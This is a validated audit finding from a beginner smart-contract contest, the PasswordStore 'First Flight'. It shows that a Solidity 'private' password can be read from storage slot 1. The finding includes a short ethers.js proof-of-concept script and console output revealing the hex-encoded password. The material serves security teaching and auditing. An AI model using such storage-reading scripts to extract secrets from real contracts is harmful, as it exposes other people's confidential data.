First Flight #1: PasswordStore
First Flight #1
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Private variables are visible

Magnetto

Summary

Private variables are visible since all the data in Ethereum block chain is public. The use of private variables is useful when you want to save gas since the compiler won't generate the getter function for variables as it does for public ones.

Vulnerability Details

The s_password is visible. Using ethers.js is possible to get the information from any storage SLOT, in this case the password in the second one, by index nomenclature it is the SLOT number "1".

POC

ViewStorage.js

const ethers = require('ethers');
async function readSlot1() {
// Connect to a provider (for example, a local node or a service like Infura)
const provider = new ethers.JsonRpcProvider('RPC_NODE_URL');
// Address of the contract whose storage slot you want to read
const contractAddress = '0x...'; // Replace with the actual contract address
// Read the content of slot 0
const data = await provider.getStorage(contractAddress, 1);
console.log('Password is:', data);
}
readSlot1();

Console

whitehat@cbe558dc2266:~/2023-10-PasswordStore$ node test/ViewStorage.js
Password is: 0x4d7950617373776f726400000000000000000000000000000000000000000014

Impact

The password is visible, and anyone can use it if they know where to us it. High.

Tools Used

Ethers.js and Auditor-Toolbox

Recommendations

Do not implement this functionality at all.

Updates

Lead Judging Commences

inallhonesty Lead Judge almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-anyone-can-read-storage

Private functions and state variables are only visible for the contract they are defined in and not in derived contracts. In this case private doesn't mean secret/confidential

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.